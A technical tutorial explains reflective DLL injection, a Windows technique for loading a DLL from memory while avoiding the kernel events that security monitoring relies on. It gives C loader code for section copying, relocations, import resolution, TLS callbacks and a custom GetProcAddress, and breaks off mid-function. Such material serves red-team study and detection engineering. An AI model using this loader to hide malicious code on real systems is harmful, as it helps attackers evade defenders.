Reflective DLL Injection
Table of contents
- Overview
- Blueprint
- Store the DLL content in memory
- Inject the DLL
- Perform image base relocations
- Process imported functions
- TLS Callback and DLL Main
- GetProcAddress
Overview
Reflective DLL Injection is a process injection technique that allows an attacker to load a DLL stored in memory rather than on disk.
Any DLL stored on disk can easily be loaded using the LoadLibrary Windows API. However, this API does not work when the DLL content is stored in memory.
Moreover, the LoadLibrary API raises some kernel events, as shown in the following figure:
Reflective DLL Injection is a way to reimplement a custom LoadLibrary function that does not raise these kernel events, hence limiting detection by the Blue Team.
Blueprint
Reflective DLL Injection can be done through the following steps:
- Store the DLL content in memory
- Parse the DLL header to retrieve the SizeOfImage value
- Allocate a memory space whose size is equal to the DLL SizeOfImage
- Copy each header and section into the allocated memory space
- Perform image base relocations if needed
- Load the DLL dependencies, i.e. the DLLs used by the loaded DLL
- Resolve imported functions and populate the Import Address Table (IAT)
- Protect memory sections according to the needs of the DLL's sections
- Run the DLL TLS callbacks
- Run the DLL main function
- Enjoy!
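The "protect memory sections" step of the list above is not detailed further in this post. As a minimal sketch, assuming the section characteristic flags and page protection values defined in the Windows headers (redefined here under hypothetical SKETCH_ names so the snippet stays portable), the mapping from a section's flags to a protection value could look like this:

```c
#include <stdint.h>

/* Values mirror IMAGE_SCN_MEM_* and PAGE_* from the Windows headers;
   the SKETCH_ names are hypothetical and only keep the snippet portable. */
#define SKETCH_SCN_MEM_EXECUTE 0x20000000u
#define SKETCH_SCN_MEM_READ    0x40000000u
#define SKETCH_SCN_MEM_WRITE   0x80000000u

#define SKETCH_PAGE_NOACCESS          0x01u
#define SKETCH_PAGE_READONLY          0x02u
#define SKETCH_PAGE_READWRITE         0x04u
#define SKETCH_PAGE_EXECUTE           0x10u
#define SKETCH_PAGE_EXECUTE_READ      0x20u
#define SKETCH_PAGE_EXECUTE_READWRITE 0x40u

/* Translate a section's Characteristics field into a page protection. */
uint32_t sketch_section_protection(uint32_t characteristics)
{
    int x = (characteristics & SKETCH_SCN_MEM_EXECUTE) != 0;
    int r = (characteristics & SKETCH_SCN_MEM_READ) != 0;
    int w = (characteristics & SKETCH_SCN_MEM_WRITE) != 0;

    if (x) {
        if (w) return SKETCH_PAGE_EXECUTE_READWRITE;
        return r ? SKETCH_PAGE_EXECUTE_READ : SKETCH_PAGE_EXECUTE;
    }
    if (w) return SKETCH_PAGE_READWRITE;
    return r ? SKETCH_PAGE_READONLY : SKETCH_PAGE_NOACCESS;
}
```

On Windows, the returned value would typically be passed to VirtualProtect for the address range of each section, once relocations and imports have been processed.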
Store the DLL content in memory
This step is quite simple. The goal is to get a buffer with the whole DLL file's content in it. The following code can be used to load a full file in memory:
BOOL FileExistsW(LPCWSTR szPath){
    DWORD dwAttrib = GetFileAttributesW(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}
PBYTE ReadFileW(LPCWSTR filename, PDWORD fileSize) {
    // Open the file with read permissions
    HANDLE hFile = CreateFileW(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        return NULL;
    }
    // Retrieve the file size (files larger than 4 GB are not handled here)
    *fileSize = GetFileSize(hFile, NULL);
    if (*fileSize == INVALID_FILE_SIZE) {
        CloseHandle(hFile);
        return NULL;
    }
    DWORD sizeRead = 0;
    // Allocate a heap buffer to hold the file content
    PBYTE content = (PBYTE)malloc(*fileSize);
    if (content == NULL) {
        CloseHandle(hFile);
        return NULL;
    }
    // Populate the allocated buffer with the file content
    BOOL result = ReadFile(hFile, content, *fileSize, &sizeRead, NULL);
    if (!result || sizeRead != *fileSize) {
        DEBUG("[x] Error during %ls file read\n", filename);
        free(content);
        content = NULL;
    }
    CloseHandle(hFile);
    // Return the buffer (NULL on error)
    return content;
}
So now the whole DLL content is stored in memory and is ready to be injected.
Inject the DLL
To inject anything in memory, you need to know the total size of what you want to inject. For PE files, such as DLLs, the size of the image once loaded in memory can be found in the NT headers.
The goal of this post is not to create a PE parser, so each field of the PE will not be explicitly documented here.
The full DLL size can be found with the following code that retrieves the OptionalHeader.SizeOfImage value:
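// dllContent is the first byte of the DLL stored in memory
DWORD getImageSize(PVOID dllContent){
    // The DOS header sits at the very start of the file
    IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)dllContent;
    // e_lfanew is the file offset of the NT headers
    IMAGE_NT_HEADERS* ntHeaders = (IMAGE_NT_HEADERS*)((PBYTE)dllContent + dosHeader->e_lfanew);
    return ntHeaders->OptionalHeader.SizeOfImage;
}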
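The function above trusts the buffer blindly. As a hedged sketch, here is a portable variant working on raw bytes that checks the MZ and PE signatures and the buffer bounds before reading SizeOfImage. The sketch_ names are hypothetical; the offsets used (e_lfanew at 0x3C, a 20-byte file header, SizeOfImage at offset 56 of the optional header) come from the PE format.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value without assuming alignment. */
static uint32_t sketch_read_u32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns SizeOfImage, or 0 if the buffer does not look like a PE file. */
uint32_t sketch_get_image_size(const uint8_t *buf, size_t len)
{
    /* The DOS header is 0x40 bytes long and starts with "MZ". */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return 0;

    uint32_t e_lfanew = sketch_read_u32(buf + 0x3C);

    /* Signature (4) + file header (20) + optional header up to and
       including SizeOfImage (56 + 4) must fit in the buffer. */
    if (e_lfanew > len || len - e_lfanew < 4 + 20 + 60)
        return 0;

    const uint8_t *nt = buf + e_lfanew;
    if (nt[0] != 'P' || nt[1] != 'E' || nt[2] != 0 || nt[3] != 0)
        return 0;

    return sketch_read_u32(nt + 4 + 20 + 56);
}
```

Returning 0 on failure is a design choice of this sketch: a valid image never has a SizeOfImage of 0, so the caller can use it as an error value.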
Then, once the full size is known, a memory region is allocated using VirtualAlloc:
PVOID startAddress = VirtualAlloc(
NULL,
dllParsed->ntHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE
);
So now, the allocated region must be populated with the DLL's headers and sections:
IMAGE_DOS_HEADER* dosHeader = (IMAGE_DOS_HEADER*)dllContent;
IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)((PBYTE)dllContent + dosHeader->e_lfanew);
// Copy the headers
CopyMemory(startAddress, dllContent, ntHeader->OptionalHeader.SizeOfHeaders);
// Copy the sections: each one moves from its file offset to its RVA
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeader);
for (DWORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++, sectionHeader++) {
    CopyMemory(
        (PBYTE)startAddress + sectionHeader->VirtualAddress,
        (PBYTE)dllContent + sectionHeader->PointerToRawData,
        sectionHeader->SizeOfRawData
    );
}
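The copy loop above assumes well-formed section headers. As a minimal sketch, assuming a hypothetical trimmed-down section structure (sketch_section is not a Windows type), a single section copy with bounds checks on both the file buffer and the allocated image could be written as follows:

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, trimmed-down view of a section header. */
typedef struct {
    uint32_t virtual_address;  /* RVA of the section in the mapped image */
    uint32_t raw_offset;       /* PointerToRawData */
    uint32_t raw_size;         /* SizeOfRawData */
} sketch_section;

/* Copy one section; returns 0 on success, -1 if a range is out of bounds. */
int sketch_copy_section(uint8_t *image, size_t image_size,
                        const uint8_t *file, size_t file_size,
                        const sketch_section *s)
{
    /* The source range must lie inside the file buffer. */
    if (s->raw_offset > file_size || s->raw_size > file_size - s->raw_offset)
        return -1;
    /* The destination range must lie inside the allocated image. */
    if (s->virtual_address > image_size ||
        s->raw_size > image_size - s->virtual_address)
        return -1;

    memcpy(image + s->virtual_address, file + s->raw_offset, s->raw_size);
    return 0;
}
```

The checks are written as subtractions on the right-hand side so that they cannot overflow, even with hostile header values.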
At the end of these steps, the whole DLL is loaded in memory at the address startAddress.
In a better world, this could be the end and the DLL entry point could be run straight away. However, there is a high probability that your DLL has not been loaded at its preferred base address.
Thus, several relocations must be done before being able to run your DLL.
Perform image base relocations
When a PE is compiled, the symbols are referenced as if the PE were loaded at a given base address. This address is the PE preferred loading address, or ImageBase address.
If the PE is not loaded at its preferred ImageBase address, the load address shift breaks all absolute references within the PE.
For example, if the PE has been compiled to reference the data A at the address 0x40000, this reference only works if the PE is loaded at the same base address as the one used during compilation. If the PE is loaded at another base address, the reference 0x40000 will no longer point to the A data but to arbitrary data in the process memory space. The A data will be stored at 0x40000 + offset, where the offset is the difference between the current loading address and the preferred ImageBase address.
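The arithmetic described above can be sketched in a few lines. The function name and the base addresses used in the usage note are illustrative assumptions; only the 0x40000 reference comes from the example in the text.

```c
#include <stdint.h>

/* Address of a symbol once the image is loaded at actual_base instead of
   preferred_base. Unsigned arithmetic wraps around, so the same formula
   also works when the image ends up below its preferred base. */
uint64_t sketch_rebase(uint64_t compiled_address,
                       uint64_t preferred_base, uint64_t actual_base)
{
    uint64_t delta = actual_base - preferred_base;
    return compiled_address + delta;
}
```

For instance, assuming a preferred base of 0x10000 and an actual base of 0x50000, the delta is 0x40000 and the data A compiled at 0x40000 is found at 0x80000.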
The .reloc section lists all the hardcoded absolute references that need fixing if the PE is not loaded at its preferred base address.
In a nutshell, the absolute addresses themselves stay hardcoded where they are used, for example in the .text or .data sections. The .reloc section only records where they are: it acts as a lookup table giving the location of every absolute reference that must be patched.
Symbol Table
The .reloc section contains the Relocation Table. This table is divided into blocks, each describing the base relocations of one 4 KB page.
The start address of the Relocation Table can be retrieved from the PE DataDirectory located in the NtHeader's OptionalHeader field. The directory stores an RVA, so the load address must be added to it:
PVOID firstRelocationBlock = (PBYTE)startAddress + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
Each block starts with an IMAGE_BASE_RELOCATION header and is followed by any number of type and offset entries.
The IMAGE_BASE_RELOCATION part can be parsed using the following structure:
typedef struct _IMAGE_BASE_RELOCATION {
DWORD VirtualAddress;
DWORD SizeOfBlock;
} IMAGE_BASE_RELOCATION;
The relocation entries of a block are stored right after its IMAGE_BASE_RELOCATION header and extend up to the block start address + SizeOfBlock. The VirtualAddress field is the RVA of the page the block applies to: each entry's offset is added to it to locate the value to patch. So, once the IMAGE_BASE_RELOCATION object is extracted from a relocation table block, it can be used to access the relocation entries, as the relocation table structure can be seen as follows:
The different IMAGE_BASE_RELOCATION blocks can be iterated using the following code:
//pseudo code
IMAGE_BASE_RELOCATION* currentRelocation = (IMAGE_BASE_RELOCATION*)firstRelocationBlock;
// A block with a null VirtualAddress ends the table
while(currentRelocation->VirtualAddress){
    // Process the current relocation block
    ...
    // Jump to the next relocation block
    currentRelocation = (IMAGE_BASE_RELOCATION*)((PBYTE)currentRelocation + currentRelocation->SizeOfBlock);
}
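Since SizeOfBlock covers the 8-byte block header plus the 16-bit entries that follow it, the number of entries in a block can be derived from it. The helper below is a small sketch with hypothetical names; it also rejects a SizeOfBlock smaller than the header, a value that would otherwise make a block-walking loop misbehave.

```c
#include <stdint.h>

#define SKETCH_RELOC_HEADER_SIZE 8u  /* VirtualAddress + SizeOfBlock */

/* Number of 16-bit entries in a block, or 0 if SizeOfBlock is malformed. */
uint32_t sketch_reloc_entry_count(uint32_t size_of_block)
{
    if (size_of_block < SKETCH_RELOC_HEADER_SIZE)
        return 0;
    return (size_of_block - SKETCH_RELOC_HEADER_SIZE) / 2u;
}
```

A block with a SizeOfBlock of 12, for example, holds two entries.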
The next step is to access each entry of a relocation block. These entries can be parsed using the following structure:
typedef struct _IMAGE_RELOCATION_ENTRY {
WORD Offset : 12;
WORD Type : 4;
} IMAGE_RELOCATION_ENTRY;
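The layout of bit-fields is implementation-defined in C, so the structure above relies on the compiler placing Offset in the low bits. As a portable sketch (the sketch_ names are hypothetical), the same decoding can be done with a shift and a mask on the raw 16-bit value:

```c
#include <stdint.h>

typedef struct {
    uint8_t  type;    /* high 4 bits of the entry */
    uint16_t offset;  /* low 12 bits, relative to the block's VirtualAddress */
} sketch_reloc_entry;

/* Split a raw 16-bit relocation entry into its type and offset. */
sketch_reloc_entry sketch_decode_reloc(uint16_t raw)
{
    sketch_reloc_entry e;
    e.type = (uint8_t)(raw >> 12);
    e.offset = (uint16_t)(raw & 0x0FFF);
    return e;
}
```

For example, the raw value 0xA123 decodes to type 10 and offset 0x123.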
Each entry contained in the relocation block can be parsed using the following code:
// pseudo code
// IMAGE_BASE_RELOCATION *currentRelocation : the current relocation block
// The entries start right after the block header
IMAGE_RELOCATION_ENTRY* relocationEntry = (IMAGE_RELOCATION_ENTRY*)&currentRelocation[1];
while ((DWORD64)relocationEntry < (DWORD64)currentRelocation + currentRelocation->SizeOfBlock){
    // process the relocation
    ...
    // jump to the next entry
    relocationEntry++;
}
So, to summarize, the following code can be used to parse a full relocation table:
//pseudo code
// The data directory stores an RVA: add the load address to get a pointer
IMAGE_BASE_RELOCATION* currentRelocation = (IMAGE_BASE_RELOCATION*)((PBYTE)startAddress + ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
while(currentRelocation->VirtualAddress){
    // process the current relocation block
    IMAGE_RELOCATION_ENTRY* relocationEntry = (IMAGE_RELOCATION_ENTRY*)&currentRelocation[1];
    while ((DWORD64)relocationEntry < (DWORD64)currentRelocation + currentRelocation->SizeOfBlock){
        // process the relocation
        ...
        // jump to the next entry
        relocationEntry++;
    }
    // jump to the next relocation block
    currentRelocation = (IMAGE_BASE_RELOCATION*)((PBYTE)currentRelocation + currentRelocation->SizeOfBlock);
}
Perform relocation
Performing a relocation means patching each value referenced by the Relocation Table entries by adding an offset equal to the difference between the real PE load address and the PE preferred load address.
So, the relocation address must be found, and its content must be updated. In order to update the relocation content, the relocation type must be taken into account. Indeed, depending on the relocation type, the modification is handled differently:
Name | Value | Description |
---|---|---|
IMAGE_REL_BASED_ABSOLUTE | 0x00 | The relocation is skipped. It is often used to pad a block |
IMAGE_REL_BASED_HIGH | 0x01 | The high 16 bits of the offset are added to the 16-bit value at the relocation address |
IMAGE_REL_BASED_LOW | 0x02 | The low 16 bits of the offset are added to the 16-bit value at the relocation address |
IMAGE_REL_BASED_HIGHLOW | 0x03 | The 32 bits of the offset are added to the 32-bit value at the relocation address |
IMAGE_REL_BASED_DIR64 | 0x0A | The 64 bits of the offset are added to the 64-bit value at the relocation address |
The following code can be used to handle the relocations:
// pseudo code
// PVOID startAddress : the actual PE load address
// IMAGE_BASE_RELOCATION* currentRelocation : the current relocation block
// Compute the offset between the actual and the preferred load address
DWORD64 offset = (DWORD64)startAddress - ntHeader->OptionalHeader.ImageBase;
// Get the first relocation entry in the block
IMAGE_RELOCATION_ENTRY* relocationEntry = (IMAGE_RELOCATION_ENTRY*)&currentRelocation[1];
// Parse all relocation entries in the relocation block
while((PBYTE)relocationEntry < (PBYTE)currentRelocation + currentRelocation->SizeOfBlock){
    // Get the relocation address
    DWORD relocationRVA = currentRelocation->VirtualAddress + relocationEntry->Offset;
    PBYTE relocationAddress = (PBYTE)startAddress + relocationRVA;
    // Process the relocation, writing only as many bits as the type covers
    switch(relocationEntry->Type){
    case IMAGE_REL_BASED_HIGH:
        // 16 high bits
        *(WORD*)relocationAddress += HIWORD(offset);
        break;
    case IMAGE_REL_BASED_LOW:
        // 16 low bits
        *(WORD*)relocationAddress += LOWORD(offset);
        break;
    case IMAGE_REL_BASED_HIGHLOW:
        // 32 bits
        *(DWORD*)relocationAddress += (DWORD)offset;
        break;
    case IMAGE_REL_BASED_DIR64:
        // 64 bits
        *(DWORD64*)relocationAddress += offset;
        break;
    default:
        // IMAGE_REL_BASED_ABSOLUTE (padding) and other types are skipped
        break;
    }
    relocationEntry++;
}
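To make the relocation logic testable outside of Windows, here is a hedged, portable sketch that applies one relocation block to an in-memory image. All sketch_ names are hypothetical. It uses the type values from winnt.h (IMAGE_REL_BASED_HIGHLOW is 3 and IMAGE_REL_BASED_DIR64 is 10), handles only those two types plus the padding type, and assumes a little-endian host.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SKETCH_REL_ABSOLUTE 0u
#define SKETCH_REL_HIGHLOW  3u
#define SKETCH_REL_DIR64    10u

/* Apply the relocation block located at image + block_rva.
   Returns 0 on success, -1 on a malformed block or an unhandled type. */
int sketch_apply_block(uint8_t *image, size_t image_size,
                       uint32_t block_rva, uint64_t delta)
{
    uint32_t page_rva, block_size;

    if (block_rva > image_size || image_size - block_rva < 8)
        return -1;
    memcpy(&page_rva, image + block_rva, 4);        /* VirtualAddress */
    memcpy(&block_size, image + block_rva + 4, 4);  /* SizeOfBlock */
    if (block_size < 8 || block_size > image_size - block_rva)
        return -1;

    /* Entries are 16-bit values stored right after the 8-byte header. */
    for (uint32_t pos = 8; pos + 2 <= block_size; pos += 2) {
        uint16_t raw;
        memcpy(&raw, image + block_rva + pos, 2);
        uint32_t type = (uint32_t)raw >> 12;
        size_t target = (size_t)page_rva + (raw & 0x0FFFu);

        if (type == SKETCH_REL_ABSOLUTE) {
            continue;  /* padding entry */
        } else if (type == SKETCH_REL_DIR64) {
            uint64_t v;
            if (target > image_size || image_size - target < 8) return -1;
            memcpy(&v, image + target, 8);
            v += delta;
            memcpy(image + target, &v, 8);
        } else if (type == SKETCH_REL_HIGHLOW) {
            uint32_t v;
            if (target > image_size || image_size - target < 4) return -1;
            memcpy(&v, image + target, 4);
            v += (uint32_t)delta;
            memcpy(image + target, &v, 4);
        } else {
            return -1;  /* type not handled in this sketch */
        }
    }
    return 0;
}
```

Using memcpy for every read and write avoids unaligned accesses, and each target is checked against the image size before being patched.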
Thus, at this point, all relocations have been performed and the program should work whatever its load address.
However, what happens if the DLL uses functions defined in another DLL? In this case, that DLL must be loaded and the function addresses must be resolved.
Process imported functions
DLLs have dependencies. Indeed, a DLL can use functions defined in other DLLs. For example, KERNEL32.DLL has NTDLL.DLL as a dependency: VirtualAlloc will call NtAllocateVirtualMemory.
Thus, these references must also be resolved.
Import Directory Table
The Import Directory Table is usually located in the .idata section and contains one entry for every DLL used by the PE.
An Import Directory Table entry can be parsed using the following structure:
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
} DUMMYUNIONNAME;
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
The Name field holds the RVA of the name of the DLL to import. Once the DLL name is known, the DLL must be loaded using a recursive call or using LoadLibrary. However, the use of LoadLibrary is somewhat problematic as it will raise several kernel events.
Then, the ILT must be parsed to fill the IAT.
IAT and ILT
The IAT is a table that will contain the addresses of the resolved symbols, i.e. the function addresses resolved through GetProcAddress. This table does not hold any resolved address when the process starts and is filled depending on the ILT information.
The ILT is a lookup table containing information about the imported functions such as their name, their ordinal, etc. The ILT information is used to resolve the imported function addresses that will be stored in the IAT.
The ILT and IAT entries can be parsed using the following structure:
typedef struct _IMAGE_THUNK_DATA {
union {
ULONGLONG ForwarderString;
ULONGLONG Function;
ULONGLONG Ordinal;
ULONGLONG AddressOfData;
} u1;
} IMAGE_THUNK_DATA;
For the ILT, the interesting parameters are:
- The AddressOfData parameter, which contains the function name RVA. This address points to the IMAGE_IMPORT_BY_NAME structure that can be used to retrieve the function name as a simple string. This string can then be used with GetProcAddress to retrieve the function address.
- The Ordinal parameter, which contains the function ordinal and can be used to resolve the function address through GetProcAddress
For the IAT, the interesting parameter is:
- The Function parameter, which will receive the function resolved address
Thus, the idea is to parse the whole ILT, use the AddressOfData or Ordinal parameter to resolve the function address and write it in the IAT's Function value.
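Whether an ILT entry should be read as AddressOfData or as Ordinal depends on its most significant bit, which is what the IMAGE_SNAP_BY_ORDINAL macro from the Windows headers tests. As a portable sketch for 64-bit thunks (the sketch_ names are hypothetical):

```c
#include <stdint.h>

/* Same value as IMAGE_ORDINAL_FLAG64 in the Windows headers. */
#define SKETCH_ORDINAL_FLAG64 0x8000000000000000ULL

/* Non-zero when the 64-bit thunk imports by ordinal (top bit set). */
int sketch_is_ordinal_import(uint64_t thunk)
{
    return (thunk & SKETCH_ORDINAL_FLAG64) != 0;
}

/* Ordinal number, stored in the low 16 bits of an ordinal thunk. */
uint16_t sketch_ordinal(uint64_t thunk)
{
    return (uint16_t)(thunk & 0xFFFFu);
}
```

When the flag is clear, the thunk value is the RVA of an IMAGE_IMPORT_BY_NAME structure instead.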
Fill the IAT
The following code can be used to process the imported functions:
// pseudo code
// Get the first Import Directory Table entry
IMAGE_IMPORT_DESCRIPTOR* importDescriptor = (IMAGE_IMPORT_DESCRIPTOR*)((PBYTE)startAddress + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
// Iterate through all Import Directory Table entries (a null Name ends the table)
for (; importDescriptor->Name; importDescriptor++) {
    // Get the IAT and ILT first entry
    PIMAGE_THUNK_DATA iat = (PIMAGE_THUNK_DATA)((PBYTE)startAddress + importDescriptor->FirstThunk);
    PIMAGE_THUNK_DATA ilt = (PIMAGE_THUNK_DATA)((PBYTE)startAddress + importDescriptor->OriginalFirstThunk);
    // Get the associated DLL name
    char* dllName = (char*)((PBYTE)startAddress + importDescriptor->Name);
    // Load the DLL
    // For readability, LoadLibraryExA is used here instead of a recursive reflective load
    HMODULE dllHandle = GetModuleHandleA(dllName);
    if (!dllHandle) {
        dllHandle = LoadLibraryExA(dllName, NULL, 0);
        if (!dllHandle) {
            return FALSE;
        }
    }
    // Iterate through the ILT entries (a null entry ends the table)
    for (; ilt->u1.Function; iat++, ilt++) {
        // Check if the function is given as an ordinal
        if (IMAGE_SNAP_BY_ORDINAL(ilt->u1.Ordinal)) {
            // Resolve the function address through its ordinal
            LPCSTR functionOrdinal = (LPCSTR)IMAGE_ORDINAL(ilt->u1.Ordinal);
            // Write function address into the IAT's corresponding entry
            iat->u1.Function = (DWORD_PTR)GetProcAddress(dllHandle, functionOrdinal);
        }
        else {
            // Load the HINT structure from the ILT information
            // The HINT structure contains the function name
            IMAGE_IMPORT_BY_NAME* hint = (IMAGE_IMPORT_BY_NAME*)((PBYTE)startAddress + ilt->u1.AddressOfData);
            // Write function address into the IAT's corresponding entry
            iat->u1.Function = (DWORD_PTR)GetProcAddress(dllHandle, hint->Name);
        }
    }
}
At this point, the DLL dependencies are loaded.
Delayed Import Table
The Delayed Import Table works much like the standard Import Directory Table. It was added to provide a uniform mechanism for applications to delay the loading of a DLL until one of its exported functions is used.
To avoid any problem, this table will be processed exactly like the Import Directory Table. The only difference is that its entries will be parsed using the following structure:
typedef struct _IMAGE_DELAYLOAD_DESCRIPTOR {
union {
DWORD AllAttributes;
struct {
DWORD RvaBased : 1;
DWORD ReservedAttributes : 31;
} DUMMYSTRUCTNAME;
} Attributes;
DWORD DllNameRVA;
DWORD ModuleHandleRVA;
DWORD ImportAddressTableRVA;
DWORD ImportNameTableRVA;
DWORD BoundImportAddressTableRVA;
DWORD UnloadInformationTableRVA;
DWORD TimeDateStamp;
} IMAGE_DELAYLOAD_DESCRIPTOR;
The DllNameRVA value contains the RVA of the DLL name.
The ImportAddressTableRVA contains the IAT's RVA. Likewise, the ImportNameTableRVA contains the ILT's RVA.
Apart from that, nothing changes and the previous code used to parse the Import Directory Table can be used as is.
TLS Callback and DLL Main
TLS Callback
TLS Callbacks are functions run before the entry point. They are often used by malware as an anti-debug technique, but also by legitimate DLLs to set up the environment.
Before running the DLL main, these callbacks must be run. They can be found through the IMAGE_DIRECTORY_ENTRY_TLS entry of the PE DataDirectory. The following code can be used to run these functions:
// pseudo code
// Check if a TLS directory is defined
if (dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].Size) {
    // Get the TLS information
    PIMAGE_TLS_DIRECTORY tlsDir = (PIMAGE_TLS_DIRECTORY)((PBYTE)startAddress + dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress);
    // Get the callback array (AddressOfCallBacks is a virtual address, not an RVA)
    PIMAGE_TLS_CALLBACK* callback = (PIMAGE_TLS_CALLBACK*)(tlsDir->AddressOfCallBacks);
    // The array is NULL-terminated and may be absent
    for (; callback && *callback; callback++) {
        // Call the function
        (*callback)((PVOID)dllParsed->baseAddress, DLL_PROCESS_ATTACH, NULL);
    }
}
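The callback array is a NULL-terminated list of function pointers, and the pointer to the array itself can be null when the TLS directory defines no callback. The following portable sketch illustrates that walk with hypothetical stand-in types (sketch_tls_callback mimics the shape of PIMAGE_TLS_CALLBACK, and sketch_demo_callback only exists to exercise the loop):

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for PIMAGE_TLS_CALLBACK. */
typedef void (*sketch_tls_callback)(void *image_base, uint32_t reason,
                                    void *reserved);

/* Demo callback: counts how many times it has been invoked. */
static int sketch_demo_calls = 0;
static void sketch_demo_callback(void *image_base, uint32_t reason,
                                 void *reserved)
{
    (void)image_base; (void)reason; (void)reserved;
    sketch_demo_calls++;
}

/* Invoke every callback of a NULL-terminated array; returns how many ran. */
size_t sketch_run_callbacks(const sketch_tls_callback *callbacks,
                            void *image_base, uint32_t reason)
{
    size_t count = 0;
    if (callbacks == NULL)
        return 0;  /* the directory exists but defines no callback */
    for (; *callbacks != NULL; callbacks++) {
        (*callbacks)(image_base, reason, NULL);
        count++;
    }
    return count;
}
```

Checking the array pointer before dereferencing it is the point of the sketch: the loop condition alone would crash on a directory without callbacks.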
DLL Main
The DLL main function is the function called when the DLL is loaded by the system. The following code is an example of DLL Main:
BOOL WINAPI DllMain(
HINSTANCE hinstDLL, // handle to DLL module
DWORD fdwReason, // reason for calling function
LPVOID lpvReserved ) // reserved
{
// Perform actions based on the reason for calling.
switch( fdwReason )
{
case DLL_PROCESS_ATTACH:
// Initialize once for each new process.
// Return FALSE to fail DLL load.
break;
case DLL_THREAD_ATTACH:
// Do thread-specific initialization.
break;
case DLL_THREAD_DETACH:
// Do thread-specific cleanup.
break;
case DLL_PROCESS_DETACH:
if (lpvReserved != nullptr)
{
break; // do not do cleanup if process termination scenario
}
// Perform any necessary cleanup.
break;
}
return TRUE; // Successful DLL_PROCESS_ATTACH.
}
When the DLL is loaded, the DLL main is called with the DLL_PROCESS_ATTACH reason. The following code can be used to call the DLL main:
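// pseudo code
typedef BOOL(WINAPI* LPDLLMAIN)(HINSTANCE imageBase, DWORD reason, LPVOID reserved);
// An AddressOfEntryPoint of 0 means the DLL has no entry point
if (dllParsed->ntHeader->OptionalHeader.AddressOfEntryPoint) {
    // AddressOfEntryPoint is an RVA: add the load address to get the function pointer
    LPDLLMAIN entryPoint = (LPDLLMAIN)((PBYTE)startAddress + dllParsed->ntHeader->OptionalHeader.AddressOfEntryPoint);
    BOOL status = entryPoint((HINSTANCE)dllParsed->baseAddress, DLL_PROCESS_ATTACH, NULL);
}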
From now on, the DLL should be fully loaded and its exported functions can be used.
GetProcAddress
The Windows GetProcAddress function will not work with the loaded DLL, and I wasn't able to understand why. Indeed, the GetProcAddress function requires a handle to the DLL (HMODULE). The HMODULE type simply represents the DLL base address. However, even when the loaded DLL base address is given to the GetProcAddress function, it cannot find the exported function.
Thus, a custom GetProcAddress function must be developed.
The PE header contains all the information needed to access the exported function names and addresses. Indeed, the DataDirectory contains the ExportDirectory address that can be used to access the AddressOfFunctions, AddressOfNames and AddressOfNameOrdinals tables.
The AddressOfNames is a table containing the RVAs of the names of the exported functions.
The AddressOfFunctions is a table containing the RVAs of the exported functions.
The AddressOfNameOrdinals is a lookup table used to link the names from the AddressOfNames to the addresses from the AddressOfFunctions.
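The following code can be used as a custom GetProcAddress:
// pseudo code
// PVOID startAddress : the actual PE load address
// LPCSTR functionName : the name of the exported function to find
DWORD exportDirectoryRVA = (DWORD)dllParsed->dataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
IMAGE_EXPORT_DIRECTORY* exportDirectory = (IMAGE_EXPORT_DIRECTORY*)((PBYTE)startAddress + exportDirectoryRVA);
LPDWORD AddressOfFunctions = (LPDWORD)((PBYTE)startAddress + exportDirectory->AddressOfFunctions);
LPDWORD AddressOfNames = (LPDWORD)((PBYTE)startAddress + exportDirectory->AddressOfNames);
LPWORD AddressOfNameOrdinals = (LPWORD)((PBYTE)startAddress + exportDirectory->AddressOfNameOrdinals);
// The name tables hold NumberOfNames entries, which can be fewer than NumberOfFunctions
for (DWORD i = 0; i < exportDirectory->NumberOfNames; i++) {
    char *name = (char*)((PBYTE)startAddress + AddressOfNames[i]);
    if (strcmp(name, functionName) == 0) {
        // The ordinal table gives the index of the function in AddressOfFunctions
        DWORD functionRVA = AddressOfFunctions[AddressOfNameOrdinals[i]];
        return (PBYTE)startAddress + functionRVA;
    }
}
// The function is not exported by name
return NULL;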
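The relationship between the three export tables can be exercised on synthetic data. The sketch below is a portable illustration with hypothetical names: sketch_exports is an already-resolved view of the tables (names given as C strings rather than RVAs), and forwarded exports are not handled.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, already-resolved view of the three export tables. */
typedef struct {
    const char *const *names;       /* AddressOfNames, as C strings */
    const uint16_t *name_ordinals;  /* AddressOfNameOrdinals */
    const uint32_t *functions;      /* AddressOfFunctions (RVAs) */
    uint32_t number_of_names;
    uint32_t number_of_functions;
} sketch_exports;

/* Returns the function RVA, or 0 when the name is not exported. */
uint32_t sketch_find_export(const sketch_exports *e, const char *wanted)
{
    /* names[] and name_ordinals[] are parallel arrays of number_of_names
       entries; name_ordinals[i] indexes into functions[]. */
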